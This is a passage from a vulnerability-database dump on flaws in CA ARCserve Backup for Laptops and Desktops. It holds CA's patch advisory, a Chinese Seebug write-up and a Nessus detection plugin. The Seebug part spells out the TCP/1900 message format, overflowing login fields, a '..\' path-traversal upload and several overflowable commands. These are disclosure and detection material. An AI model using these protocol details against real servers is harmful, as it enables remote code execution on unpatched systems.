"-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nTitle: [CAID 35673, 35674, 35675, 35676, 35677]: CA ARCserve \r\nBackup for Laptops and Desktops Multiple Server Vulnerabilities\r\n\r\nCA Vuln ID (CAID): 35673, 35674, 35675, 35676, 35677\r\n\r\nCA Advisory Date: 2007-09-20\r\n\r\nReported By: Sean Larsson (VeriSign iDefense Labs)\r\n anonymous researcher working with the iDefense VCP\r\n eEye Digital Security\r\n\r\n\r\nImpact: A remote attacker can execute arbitrary code or cause a \r\ndenial of service condition.\r\n\r\nSummary: CA ARCserve Backup for Laptops and Desktops contains \r\nmultiple vulnerabilities that can allow a remote attacker to cause \r\na denial of service condition or execute arbitrary code. The first \r\nset of vulnerabilities, CVE-2007-3216, occur due to insufficient \r\nbounds checking on multiple command arguments by the LGServer \r\nservice. The second set of vulnerabilities, CVE-2007-5003, occur \r\ndue to insufficient bounds checking on rxrLogin authentication \r\ncredentials and on a username by the GetUserInfo() function. The \r\nthird vulnerability, CVE-2007-5004, occurs due to insufficient \r\nverification of an integer value used during authentication, which \r\ncan lead to integer overflow. The fourth vulnerability, \r\nCVE-2007-5005, occurs due to insufficient verification of file \r\nuploads by the NetBackup service. The fifth vulnerability, \r\nCVE-2007-5006, occurs due to insufficient verification of \r\nauthorization credentials, which can enable an attacker to bypass \r\nauthentication.\r\n\r\nMitigating Factors:\r\nThese issues can only be exploited on a server installation of CA \r\nARCserve Backup for Laptops and Desktops. The client installation \r\nis not affected.\r\n\r\nSeverity: CA has given these vulnerabilities a maximum risk rating \r\nof High.\r\n\r\nAffected Products:\r\nCA ARCserve Backup for Laptops and Desktops r11.5\r\nCA ARCserve Backup for Laptops and Desktops r11.1 SP2\r\nCA ARCserve Backup for Laptops and Desktops r11.1 SP1\r\nCA ARCserve Backup for Laptops and Desktops r11.1\r\nCA ARCserve Backup for Laptops and Desktops r11.0\r\nCA ARCserve Backup for Laptops and Desktops r4.0\r\nCA Desktop Management Suite 11.2\r\nCA Desktop Management Suite 11.1\r\nCA Desktop Management Suite 11.0\r\nCA Protection Suites r2\r\n\r\nAffected Platforms:\r\nWindows\r\n\r\nStatus and Recommendation:\r\nCA has provided updates to address the vulnerabilities.\r\n\r\nCA ARCserve Backup for Laptops and Desktops (BMB) r4.0:\r\nApply QO91013.\r\n\r\nCA ARCserve Backup for Laptops and Desktops 11.1:\r\nApply QO91014.\r\n\r\nCA Desktop Management Suite 11.1:\r\nApply QO91016.\r\n\r\nCA Desktop Management Suite 11.2 English:\r\nApply QO91110.\r\n\r\nCA ARCserve Backup for Laptops and Desktops 11.5:\r\nApply QO91015.\r\n\r\nCA Desktop Management Suite 11.2 localized:\r\nApply QO91111.\r\n\r\nHow to determine if you are affected:\r\nFor Windows:\r\n1. Using Windows Explorer, locate the file "rxRPC.dll". The file \r\ncan be found in the following default locations:\r\n\r\nProducts \ Directory Paths\r\n- --------------------------\r\nCA ARCserve Backup for Laptops and Desktops 11.5 \r\nC:\Program Files\CA\BrightStor ARCserve Backup for Laptops & \r\nDesktops\Explorer \r\n\r\nCA ARCserve Backup for Laptops and Desktops 11.1 \r\nC:\Program Files\CA\BrightStor ARCserve Backup for Laptops & \r\nDesktops\server \r\n\r\nCA ARCserve Backup for Laptops and Desktops (BMB) r4.0 \r\nC:\Program Files\CA\BrightStor Mobile Backup\Server \r\n\r\nCA Desktop Management Suite 11.2 English \r\nC:\Program Files\CA\DSM\BABLD\MGUI \r\n\r\nCA Desktop Management Suite 11.2 localized \r\nC:\Program Files\CA\DSM\BABLD\MGUI \r\n\r\nCA Desktop Management Suite 11.1 \r\nC:\Program Files\CA\Unicenter DSM\BABLD\Manager \r\n\r\n2. Right click on the file and select Properties.\r\n3. Select the General tab.\r\n4. If the file date is earlier than indicated in the table below, \r\n the installation is vulnerable.\r\n\r\nProduct \ File Name \ File Date / Size \r\n- ----------------------------------------\r\nCA ARCserve Backup for Laptops and Desktops 11.5 \r\nrxRPC.dll \r\nJune 25 2007 / 135168 bytes \r\n\r\nCA ARCserve Backup for Laptops and Desktops 11.1 \r\nrxRPC.dll \r\nJune 20 2007 / 114688 bytes \r\n\r\nCA ARCserve Backup for Laptops and Desktops (BMB) r4.0 \r\nrxRPC.dll \r\nJune 18 2007 / 106496 bytes \r\n\r\nCA Desktop Management Suite 11.2 English \r\nrxRPC.dll \r\nJune 25 2007 / 126976 bytes \r\n\r\nCA Desktop Management Suite 11.2 localized \r\nrxRPC.dll \r\nJuly 03 2007 / 135168 bytes \r\n\r\nCA Desktop Management Suite 11.1 \r\nrxRPC.dll \r\nJuly 03 2007 / 122880 bytes \r\n\r\n\r\nWorkaround: None\r\n\r\nReferences (URLs may wrap):\r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA ARCserve Backup for Laptops and Desktops Server Security Notice\r\nhttp://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-\r\nsecuritynotice.asp\r\nSolution Document Reference APARs:\r\nQO91013, QO91014, QO91016, QO91110, QO91015, QO91111\r\nCA Security Advisor posting:\r\nCA ARCserve Backup for Laptops and Desktops Multiple Server \r\nVulnerabilities\r\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=156006\r\nCA Vuln ID (CAID): 35673, 35674, 35675, 35676, 35677\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35673\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35674\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35675\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35676\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35677\r\nReported By: Sean Larsson (VeriSign iDefense Labs)\r\n anonymous researcher working with the iDefense VCP\r\n eEye Digital Security\r\niDefense advisory:\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\neEye advisory:\r\nMultiple Vulnerabilities in CA ARCserve for Laptops & Desktops\r\nhttp://research.eeye.com/html/advisories/published/AD20070920.html\r\nCVE References:\r\nCVE-2007-3216, CVE-2007-5003, CVE-2007-5004, CVE-2007-5005, \r\nCVE-2007-5006\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5003\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5004\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5005\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5006\r\nOSVDB References: Pending\r\nhttp://osvdb.org/\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA\r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory, \r\nplease send email to vuln AT ca DOT com.\r\n\r\nIf you discover a vulnerability in CA products, please report your\r\nfindings to vuln AT ca DOT com, or utilize our "Submit a \r\nVulnerability" form. \r\nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, 1 CA Plaza, Islandia, NY 11749\r\n \r\nContact http://www.ca.com/us/contact/\r\nLegal Notice http://www.ca.com/us/legal/\r\nPrivacy Policy http://www.ca.com/us/privacy/\r\nCopyright (c) 2007 CA. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 9.5.3 (Build 5003)\r\n\r\nwj8DBQFG9BGneSWR3+KUGYURAmVaAJ9qnNG0Ao5OIdf5+ktDyanXJWRYjACcCGxz\r\ne15FudL3++KwJXizqOOwBAU=\r\n=L274\r\n-----END PGP SIGNATURE-----\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "reporter": "Securityvulns", "published": "2007-09-24T00:00:00", "title": "[Full-disclosure] [CAID 35673, 35674, 35675, 35676, 35677]: CA ARCserve Backup for Laptops and Desktops Multiple Server Vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:23", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-5006", "CVE-2007-5005", "CVE-2007-5003", "CVE-2007-3216", "CVE-2007-5004"], "modified": "2007-09-24T00:00:00", "id": "SECURITYVULNS:DOC:18057", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18057", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:57:48", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 24348\r\nCVE(CAN) ID: CVE-2007-3216,CVE-2007-5003,CVE-2007-5004,CVE-2007-5005,CVE-2007-5006\r\n\r\nARCServe Backup for Laptops and Desktops (L&D)\u662f\u9002\u7528\u4e8e\u4e2d\u5c0f\u4e1a\u52a1\u7684ARCServe Backup\u5907\u4efd\u5de5\u5177\u7248\u672c\u3002\r\n\r\nARCserve L&D\u5728\u5904\u7406RPC\u63a5\u53e3\u4e0a\u7684\u7578\u5f62\u8bf7\u6c42\u6570\u636e\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63a7\u5236\u670d\u52a1\u5668\u6216\u6267\u884c\u76ee\u5f55\u904d\u5386\u3002\r\n\r\nARCserve L&D\u4f7f\u7528TCP/1900\u7aef\u53e3\u505a\u4e3aRPC\u63a5\u53e3\u7ba1\u7406ARCserve L&D\u670d\u52a1\u5668\uff0c\u6b63\u5e38\u7684\u901a\u8baf\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 0000000027rxrLogin~~administrator\r\n ---------------------------------------------\r\n Field 1: 10-digit base10 command length field ("0000000027")\r\n Field 2: RPC command ("rxrLogin")\r\n Field 3: Constant Argument Delimiter ("~~")\r\n Field 4: Argument ("administrator")\r\n\r\n#1 \u8ba4\u8bc1\u7528\u6237\u540d\u7f13\u51b2\u533a\u6ea2\u51fa\r\n\r\nrxRPC.dll\u7684\u8ba4\u8bc1\u90e8\u5206\uff08\u901a\u8fc7TCP/1900\u8bbf\u95ee\uff09\u4e2d\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5408\u6cd5\u7684\u8ba4\u8bc1\u62a5\u6587\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 0000000013rxrLogin~~administrator\r\n\r\n\u8ba4\u8bc1\u65f6\u4f7f\u7528wsprintfW\u5c06administrator\u53c2\u6570\u62f7\u8d1d\u5230\u4e86\u6808\u4e0a0x1AC\u5927\u5c0f\u7684\u7f13\u51b2\u533a\uff0c\u4f46\u6ca1\u6709\u6267\u884c\u5b57\u7b26\u4e32\u957f\u5ea6\u68c0\u67e5\uff0c\u5982\u679c\u5728\u7b2c\u4e00\u4e2a\u8ba4\u8bc1\u8bf7\u6c42\u4e2d\u53d1\u9001\u4e86\u8d85\u957f\u7528\u6237\u540d\u7684\u8bdd\u5c31\u53ef\u4ee5\u89e6\u53d1\u53ef\u5229\u7528\u7684\u6ea2\u51fa\u3002\r\n\r\n#2 \u8ba4\u8bc1\u53e3\u4ee4\u7f13\u51b2\u533a\u6ea2\u51fa\r\n\r\nrxRPC.dll\u7684\u8ba4\u8bc1\u90e8\u5206\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5e26\u6709\u53e3\u4ee4\u7684\u5408\u6cd5\u8ba4\u8bc1\u8bf7\u6c42\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 1: 0000000030rxrLogin~~administrator~~0000200\r\n 2: MyPasswordIs1234\r\n\r\n\u7b2c\u4e00\u4e2arxrLogin\u8bf7\u6c42\u7684\u7b2c\u4e8c\u4e2a\u53c2\u6570\u5b9a\u4e49\u4e86\u4e0b\u4e00\u4e2a\u8bf7\u6c42\u4e2d\u6240\u8981\u53d1\u9001\u53e3\u4ee4\u7684\u957f\u5ea6\u3002\u5c3d\u7ba1\u5df2\u7ecf\u9a8c\u8bc1\u4e86\u7b2c\u4e8c\u4e2a\u8bf7\u6c42\u4e2d\u7684\u53e3\u4ee4\u5b57\u7b26\u4e32\u957f\u5ea6\u4e3a\u6b63\u786e\u7684\u957f\u5ea6\uff0c\u4f46\u6ca1\u6709\u5bf9\u53e3\u4ee4\u957f\u5ea6\u6267\u884c\u8fb9\u754c\u68c0\u67e5\u3002\u5982\u679c\u5728\u7b2c\u4e8c\u4e2a\u8bf7\u6c42\u4e2d\u7684\u8d85\u957f\u53e3\u4ee4\u6307\u5b9a\u4e86\u8d85\u957f\u53e3\u4ee4\u957f\u5ea6\u7684\u8bdd\uff0c\u5c31\u4f1a\u6ea2\u51fa\u53e3\u4ee4\u5b57\u7b26\u4e32\u76ee\u7684\u5730\u6240\u4f7f\u7528\u7684\u6808\u7f13\u51b2\u533a\u3002\r\n\r\n#3 \u8ba4\u8bc1\u53e3\u4ee4\u6574\u6570\u6ea2\u51fa\r\n\r\nrxRPC.dll\u7684\u8ba4\u8bc1\u90e8\u5206\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5e26\u6709\u65e0\u6548\u53e3\u4ee4\u7684\u5408\u6cd5\u8ba4\u8bc1\u8bf7\u6c42\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 1: 0000000030rxrLogin~~administrator~~18\r\n 2: 000000000000000000\r\n\r\n\u52a0\u5bc6\u7684\u65e0\u6548\u53e3\u4ee4\u53ef\u80fd\u5bfc\u81f4\u53ef\u5229\u7528\u7684\u60c5\u51b5\uff1a\r\n\r\n .text: 00231F24 mov cl, [esi+8]\r\n .text: 00231F27 and ecx, 0x0F\r\n .text: 00231F2A add esp, 8\r\n .text: 00231F2D dec ecx ; XXXX Integer Overflow If ECX = 0\r\n .text: 00231F2E mov [esp+0x7C+var_6C], eax\r\n .text: 00231F32 mov dwPasswordCopyLength, ecx\r\n .text: 00231F38 mov eax, ecx\r\n .text: 00231F3A lea esi, [esp+0x7C+var_6C]\r\n .text: 00231F3E mov edi, ebx\r\n .text: 00231F40 shr ecx, 2\r\n .text: 00231F43 rep movs ; XXXX EXCEPTION: HITS PAGE BOUNDARY XXXX\r\n\r\n\u6e90\u7f13\u51b2\u533a\u4e2d\u7684\u6570\u636e\u5305\u542b\u6709\u5927\u91cf\u4e0d\u53ef\u63a7\u7684\u6570\u636e\uff0c\u4f46\u8fd8\u5b58\u5728\u7528\u6237\u540d\u7684\u62f7\u8d1d\uff0c\u56e0\u6b64\u5982\u679c\u5728\u539f\u59cb\u62a5\u6587\u4e2d\u6307\u5b9a\u4e86\u8d85\u957f\u7528\u6237\u540d\u7684\u8bdd\u5c31\u4f1a\u8986\u76d6\u5f02\u5e38\u5904\u7406\u5668\u3002\r\n\r\n#4 \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\r\n\r\nrxRPC.dll\u7684\u672a\u7ecf\u8ba4\u8bc1\u901a\u8baf\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002\u4e0a\u4f20\u8bf7\u6c42\u7684\u6587\u4ef6\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 1: 0000000056rxrReceiveFileFromServer~~8~~test1234.txt~~4~~3675727989\r\n 2: 0000000031~~<file_contents>\r\n\r\n\u8bf7\u6c42\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86rxrReceiveFileFromServer\u7684\u5b50\u547d\u4ee4\uff0c\u6570\u5b578\u8868\u793a\u6587\u4ef6\u4f1a\u4e0a\u4f20\u5230ARCserve L&D\u7684\u5b89\u88c5\u76ee\u5f55\uff1b\u7b2c\u4e8c\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86\u6587\u4ef6\u76ee\u6807\u540d\u79f0\uff1b\u7b2c\u4e09\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86\u76ee\u6807\u6587\u4ef6\u7684\u957f\u5ea6\uff1b\u7b2c\u4e94\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86\u5165\u7ad9\u6587\u4ef6\u7684CRC32\u54c8\u5e0c\u3002\r\n\r\n\u4f46rxRPC.dll\u6ca1\u6709\u9632\u8303\u901a\u8fc7\u5b50\u51fd\u65708\u7684\u76ee\u5f55\u904d\u5386\uff0c\u56e0\u6b64\u5982\u679c\u6587\u4ef6\u540d\u4e2d\u5305\u542b\u6709\u201c..\\\u201d\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u5bfc\u81f4\u4ee5\u7cfb\u7edf\u7ea7\u6743\u9650\u5411\u4efb\u610f\u76ee\u5f55\u5199\u5165\u4efb\u610f\u6587\u4ef6\u3002\r\n\r\n#5 \u591a\u4e2a\u7c7b\u4f3c\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\r\n\r\n\u6709\u516b\u4e2a\u901a\u8fc7TCP/1900\u7aef\u53e3\u53ef\u8bbf\u95ee\u7684\u51fd\u6570\u4e2d\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n rxsUseLicenseIni~~<overflow>\r\n rxsLicGetSiteId~~<overflow>\r\n rxsGetLogFileNames~~<overflow>~~40000\r\n rxsGetBackupLog~~aa~~<overflow>~~40000\r\n rxsBackupComplete~~aa~~aa~~aa~~<overflow>~~aa\r\n rxsSetDataGrowthScheduleAndFilter~~aa~~aa~~aa~~aa~~<overflow>\r\n rxsSetDefaultConfigName~~<overflow>\r\n rxrSetMessageLogSettings~~65~~45~~79~~65~~<overflow>~~52~65~73~65~61~72~63~68~21\r\n\r\n\n\nComputer Associates Protection Suites r2\r\nComputer Associates ARCserve Backup (L&D) r4.0\r\nComputer Associates ARCserve Backup (L&D) r11.5\r\nComputer Associates ARCserve Backup (L&D) r11.1 SP2\r\nComputer Associates ARCserve Backup (L&D) r11.1 SP1\r\nComputer Associates ARCserve Backup (L&D) r11.1\r\nComputer Associates ARCserve Backup (L&D) r11.0\r\nComputer Associates Desktop Management Suite 11.2\r\nComputer Associates Desktop Management Suite 11.1\r\nComputer Associates Desktop Management Suite 11.0\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728\u4e3b\u673a\u7981\u7528TCP/1900\u7aef\u53e3\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nComputer Associates\r\n-------------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp\" target=\"_blank\">http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp</a>", "reporter": "Root", "published": "2007-09-25T00:00:00", "title": "CA ARCserve Backup\u591a\u4e2a\u8fdc\u7a0b\u6ea2\u51fa\u53ca\u76ee\u5f55\u904d\u5386\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3216", "CVE-2007-5003", "CVE-2007-5004", "CVE-2007-5005", "CVE-2007-5006"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2007-09-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2247", "id": "SSV:2247", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}], "nessus": [{"lastseen": "2018-09-02T00:11:26", "references": ["http://www.nessus.org/u?9c393da3"], "pluginID": "69317", "description": "According to the version of rxRPC.dll installed on the remote host, the Computer Associates product is affected by multiple vulnerabilities that could allow a remote attacker to execute arbitrary code on the host.", "edition": 6, "reporter": "Tenable", "published": "2013-08-13T00:00:00", "title": "CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Remote Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5006", "CVE-2007-5005", "CVE-2008-1329", "CVE-2007-5003", "CVE-2008-1328", "CVE-2007-3216", "CVE-2007-5004"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:ca:arcserve_backup_for_laptops_and_desktops", "cpe:/a:ca:desktop_management_suite", "cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops"], "id": "CA_BABLD_LGSERVER_RCE1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69317", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69317);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\n \"CVE-2007-3216\",\n \"CVE-2007-5003\",\n \"CVE-2007-5004\",\n \"CVE-2007-5005\",\n \"CVE-2007-5006\",\n \"CVE-2008-1328\",\n \"CVE-2008-1329\"\n );\n script_bugtraq_id(\n 24348,\n 28616\n );\n\n script_name(english:\"CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Remote Vulnerabilities\");\n script_summary(english:\"Checks version of rxRPC.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has software installed that is affected by multiple\nremote vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to the version of rxRPC.dll installed on the remote host, the\nComputer Associates product is affected by multiple vulnerabilities that\ncould allow a remote attacker to execute arbitrary code on the host.\"\n );\n # https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=173105\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c393da3\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Apply the appropriate patch per the vendor's advisory.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 119, 189, 287);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/09/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:arcserve_backup_for_laptops_and_desktops\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:brightstor_arcserve_backup_laptops_desktops\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ca:desktop_management_suite\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nregistry_init();\nport = kb_smb_transport();\n\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nkey_list = make_list(\n # BABLD (Server) 11.5 / 11.1\n \"SOFTWARE\\ComputerAssociates\\BrightStor Mobile Backup Server\\CurrentVersion\\InstallDir\",\n # BABLD (Explorer) 11.5\n \"SOFTWARE\\ComputerAssociates\\BrightStor Mobile Backup Manager GUI\\CurrentVersion\\InstallDir\",\n # BABLD (Explorer) 11.1\n \"SOFTWARE\\ComputerAssociates\\BrightStor Mobile Backup Admin Gui\\CurrentVersion\\InstallDir\"\n);\n\ncheck_paths = make_list();\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nforeach key (key_list)\n{\n path = get_registry_value(handle:hklm, item:key);\n if (!isnull(path) && path != '')\n check_paths = make_list(check_paths, tolower(path));\n}\n\nRegCloseKey(handle:hklm);\n\n# Additional hard-coded check paths for CA Desktop Management Suite\ncheck_paths = make_list(\n check_paths,\n tolower(\"C:\\Program Files (x86)\\CA\\DSM\\BABLD\\MGUI\\\"),\n tolower(\"C:\\Program Files\\CA\\DSM\\BABLD\\MGUI\\\")\n);\n\ncheck_paths = list_uniq(check_paths);\n\ninfo = '';\n\nforeach path (check_paths)\n{\n file = path + 'rxRPC.dll';\n\n share = ereg_replace(pattern:'^([A-Za-z]):.*', replace:'\\\\1$', string:file);\n dll = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:'\\\\1', string:file);\n\n NetUseDel(close:FALSE);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n continue;\n\n fh = CreateFile(\n file:dll,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n if (isnull(fh)) continue;\n\n ver = GetFileVersion(handle:fh);\n if (!isnull(ver))\n version = join(ver, sep:'.');\n else\n continue;\n\n ret = GetFileVersionEx(handle:fh);\n CloseFile(handle:fh);\n\n if (!isnull(ret))\n timestamp = int(ret['dwTimeDateStamp']);\n else\n continue;\n\n fix = '';\n fix_ts = '';\n\n if (version =~ \"^11\\.0\\.\")\n {\n fix = '11.1 SP2 (QI85497) with QO95512';\n }\n else if (version =~ \"^11\\.1\\.\")\n {\n # fix: QO95512\n # ts: 1203315832\n # Monday, February 18, 2008 1:23:52 AM EST\n if (timestamp < 1203315832)\n {\n fix = 'QO95512';\n fix_ts = '1203315832';\n }\n }\n else if (version =~ \"^11\\.5\\.\")\n {\n # fix: QO95513\n # ts: 1203318093\n # Monday, February 18, 2008 2:01:33 AM EST\n if (timestamp < 1203318093)\n {\n fix = 'QO95513';\n fix_ts = '1203318093';\n }\n }\n\n if (fix != '')\n {\n info += '\\n Path : ' + file +\n '\\n Version : ' + version +\n '\\n Timestamp : ' + timestamp;\n if (fix_ts != '')\n info += '\\n Fixed Timestamp : ' + fix_ts;\n info += '\\n Required Patch : ' + fix + '\\n';\n }\n}\n\nNetUseDel();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n report = '\\nNessus found the following unpatched rxRPC.dll files :\\n' + info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\n\nexit(0, 'No vulnerable CA products found.');\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
